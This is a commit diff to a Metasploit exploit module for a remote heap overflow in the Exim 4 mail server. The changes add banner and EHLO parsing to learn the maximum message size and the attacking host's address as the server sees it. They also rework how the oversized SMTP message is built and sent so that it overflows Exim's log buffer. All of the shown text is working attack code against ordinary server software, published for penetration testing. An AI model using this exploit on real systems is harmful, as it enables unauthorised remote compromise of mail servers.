Automagic updates to jduck's exim module

git-svn-id: file:///home/svn/framework3/trunk@11277 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/unix/smtp/exim4_string_format.rb

@@ -83,22 +83,77 @@ class Metasploit3 < Msf::Exploit::Remote
 			# Originally discovered/reported Dec 2 2008
 			'DisclosureDate' => 'Dec 7 2010', # as an actual security bug
 			'DefaultTarget'  => 0))
+			
+			register_advanced_options([
+				OptString.new("SourceAddress", [false, "The IP or hostname of this system as the target will resolve it"])
+			], self.class)
 	end
 
 	def exploit
 
-		from = datastore['MAILFROM']
-		to = datastore['MAILTO']
-
-		helo_host = "X"  # From the mixin
+		
+		#
+		# Connect and grab the banner
+		#
+		ehlo = Rex::Text.rand_text_alphanumeric(8)
+		connect
+		print_status("Server: #{self.banner.strip}")
+		ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
+		
+		if self.banner =~ /Exim (4\.[789]\d)/
+			print_error("Warning: Exim version #{$1} is not exploitable")
+		end
+		
+		if self.banner !~ /Exim/i
+			print_error("Warning: Could not detect an Exim target")
+		end
+		
+		ehlo_resp.each_line do |line|
+			print_status("EHLO: #{line.strip}")
+		end
+		
+		#
+		# Determine the maximum message size
+		#
 		max_msg = 52428800
-		msg_len = max_msg + 1000 # just for good measure
+		if ehlo_resp.to_s =~ /250-SIZE (\d+)/
+			max_msg = $1.to_i
+		end
+		
+		#
+		# Determine what hostname the server sees
+		#
+		saddr = nil
+		if ehlo_resp =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/
+			ehlo  = $1
+			saddr = $2
+		end
+		
+		from = datastore['MAILFROM']
+		to   = datastore['MAILTO']
+		
+		resp = raw_send_recv("MAIL FROM: #{from}\r\n")
+		print_status("MAIL: #{resp.strip}")
+		
+		resp = raw_send_recv("RCPT TO: #{to}\r\n")		
+		print_status("RCPT: #{resp.strip}")
+		
+		resp = raw_send_recv("DATA\r\n")
+		print_status("DATA: #{resp.strip}")		
+
+
+		#
+		# Calculate the headers
+		#
+		msg_len         = max_msg + (1024*256) # just for good measure
 		log_buffer_size = 8192
-		ip = Rex::Socket.source_address('1.2.3.4')
+		source          = saddr || datastore["SourceAddress"] || Rex::Socket.source_address('1.2.3.4')
+		
+		print_status("Determined our hostname is #{ehlo} and IP address is #{source}")
 
 		# The initial headers will fill up the 'log_buffer' variable in 'log_write' function
-		print_status("Constructing initial headers ...")
-		log_buffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <#{from}> H=(#{helo_host}) [#{ip}]: message too big: read=#{msg_len} max=#{max_msg}\n"
+		print_status("Constructing initial headers (source #{source})...")
+		log_buffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <#{from}> H=(#{ehlo}) [#{source}]: message too big: read=#{msg_len} max=#{max_msg}\n"
 		log_buffer << "Envelope-from: <#{from}>\nEnvelope-to: <#{to}>\n"
 
 		# Now, "  " + hdrline for each header
@@ -135,28 +190,24 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# In order to trigger the overflow, we must get our message rejected.
 		# To do so, we send a message that is larger than the maximum.
-		print_status("Constructing body ...")
+		
+		print_status("Constructing body ...")		
 		body = ''
-		659883.times {
-			body << ("MAILbomb" * 10) + "\n"
-		}
+		fill = (Rex::Text.rand_text_alphanumeric(254) + "\r\n") * 16384
+		
+		while(body.length < msg_len)
+			body << fill
+		end
+		body = body[0, msg_len]
 
-		body_len = 53450538 - (53477372-52428800) + 1
-
-		print_status("Combining parts ...")
-		data = ''
-		data << hdrs1
-		data << hdrx
-		data << "\n"
-		data << body
-
-		print_status("Connecting ...")
-		connect_login
 		print_status("Sending data ...")
-		sock.put data
+		sock.put hdrs1
+		sock.put hdrx
+		sock.put "\n"
+		sock.put body
 
 		print_status("Ending first message.")
-		buf = raw_send_recv("\n.\n")
+		buf = raw_send_recv("\r\n.\r\n")
 		# Should be: ""552 Message size exceeds maximum permitted\r\n"
 		print_status("Result: #{buf.inspect}") if buf